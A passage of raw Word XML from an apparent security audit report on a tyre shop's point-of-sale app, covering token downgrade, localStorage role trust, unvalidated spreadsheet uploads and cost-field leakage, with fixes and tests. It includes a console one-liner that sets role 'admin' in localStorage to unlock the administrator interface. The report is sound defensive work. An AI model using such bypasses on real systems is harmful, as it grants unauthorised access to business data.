          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http:// </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pubudutyres.codexpress.codes , while .env:1 used https:// for the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> same host</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — a downgrade, not a host lacking TLS. Every proxied request carries Authorization: Bearer &lt;token&gt; , so tokens, customer phone numbers and cost prices travelled one hop unencrypted. Because tokens never expired (V-06), a token captured once stayed valid indefinitely.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015F">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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the rewrite, plus HSTS and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upgrade-insecure-requests</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the new CSP as browser-side backstops.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000160">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V-16 · Token in localStorage; role trusted from client storage</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000161">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="173" w:before="280" w:line="259"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A07:2021 / A01:2021 · </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-522</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CWE-603</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High</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000162">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Three related defects.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000163">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="264" w:hanging="264"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The token and full user record lived in localStorage  readable by any script on the origin, not scoped to a tab, surviving browser close. This is the storage that V-13's payload read.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000164">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="265" w:right="16" w:hanging="251"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">role was read back out of that writable storage and used for access control ( App.jsx:50 , lib/auth.js:15 ), and AuthContext.jsx:27-46 restored the session with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">no server call at all</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Typing localStorage.setItem('user', JSON.stringify({role:'admin'})) and reloading produced the administrator UI.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000165">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Worse, the financial data was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">already in the response</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and merely hidden  Reports.jsx:337,420,518,… conditionally render cost and margin columns, so an employee saw them in DevTools regardless. And /sales/profit was missing adminOnly entirely while the sidebar showed "Profit" only to admins, so it </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">looked</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> restricted.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000166">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="265" w:right="16" w:hanging="251"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Logout cleared only two keys, leaving invoice drafts with customer PII, grn_report_data containing wholesale </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cost prices</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the cached service catalogue behind for the next cashier on a shared till.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000167">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The token now lives in a module-scoped variable ordinary memory, not enumerable, gone when the tab closes with a per-tab sessionStorage mirror so a refresh does not sign the cashier out mid-sale. AuthContext calls GET /me on boot and uses the response as the authority on identity and role; on failure it explicitly does </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> fall back to the cached record. clearAllAppStorage() clears the token, the user cache, both legacy keys and the five business-data keys.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000168">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adminOnly added to /sales/profit . Cost and margin reporting moved behind admin middleware server-side (V-02), so the figures no longer reach an employee's browser at all. The dead duplicate src/services/api.js which imported from a module that does not exist and read a divergent auth_token key logout never cleared deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000169">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0" w:before="28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V-17 · Unvalidated uploads reached a vulnerable parser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="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3"/>
          <w:szCs w:val="23"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP A05/A06:2021 · CWE-434, CWE-400 · Medium Four upload paths disagreed about validation. GrnAdjust.jsx:1223 was the worst this is the complete validation:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016B">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const file = e.target.files[0];</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016C">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if (!file) return;                  // &lt;- all of it</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016D">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p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016E">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const workbook = XLSX.read(data, { type: "array" });</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016F">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The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">accept=".xlsx,.xls,.csv"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> attribute looks like a control but is a file-picker hint, bypassed by drag-and-drop or renaming. Arbitrary bytes of arbitrary size reached </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xlsx@0.18.5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with its two CVEs.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000170">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A shared validator applied to all four paths: presence, 10 MB cap, extension allow-list, MIME check, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">magic bytes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the only check an attacker cannot rename their way past, and why the function is async. .xlsx must start 50 4B (ZIP),.xls D0 CF 11 E0 A1 B1 1A E1 (OLE2) or ZIP, .csv must contain no NUL in its first bytes. A 5,000-row cap before mapping.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000171">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V-18 · Wholesale cost and margin disclosed to every employee</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000172">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="166" w:before="280" w:line="265"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OWASP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> A01:2021 Broken Access Control · </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP API3:2023 Broken Object Property Level Authorization</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CWE213</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CWE-200</w:t>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High</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000173">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The front end hid supplier cost and margin columns from an employee, but the API sent the numbers anyway. With an ordinary cashier token, all five endpoints needed for stock lookup returned confidential fields: GET /grns , /grns/stock , /grns/product/{code}/batches , /grns/{id} and /grns/code/{grnCode} . The responses exposed stock_price , actual_cost , main_branch_price , supplier discount levels, total_cost and total_profit .</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000174">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is not a display bug. A cashier can open the browser Network tab and read exactly what the shop pays for each tyre, calculate the margin, and disclose supplier terms to a competitor. V-02 had already restricted the profit </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reports</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to administrators; these operational stock APIs remain legitimately reachable by cashiers, so the property-level policy must be enforced in the response itself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000175">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Fix.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> HidesCostFromEmployees applies a model-level default deny list to Grn and GrnItem . Cost, discount and margin attributes are hidden on every serialization unless revealCostTo() receives an administrator. The two endpoints that construct response arrays manually use the same single costFieldsVisibleTo() decision, returning only availability, selling price and final customer price to employees. This is intentionally fail-safe: a future endpoint that serializes either model omits supplier terms unless an administrator is explicitly authorized.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000176">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Verified.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The runtime PoC calls each of the five endpoints as a cashier and finds none of eleven confidential field names; each response remains HTTP 200 and retains selling_price . The same script confirms an administrator still sees cost fields. ResponseFilteringTest adds 16 regression tests covering all five endpoints, the safe model default, null-user failclosed behaviour, and legitimate administrator access.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000177">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="80" w:before="280" w:lineRule="auto"/>
        <w:ind w:left="24" w:hanging="1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32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Supporting defects fixed in passing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000178">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 headline vulnerabilities, but each one blocked reproducible provisioning or masked a real defect.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000179">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="446" w:hanging="221"/>
        <w:rPr>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V-19a : The application could not be installed from source.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Three migrations created personal_access_tokens : Sanctum's own (auto-loaded) plus two byte-identical application copies. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017A">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Any clean php artisan migrate aborted with error 1050. Invisible to the original team because their database predated the duplicates.</w:t>
      </w:r>
    </w:p>
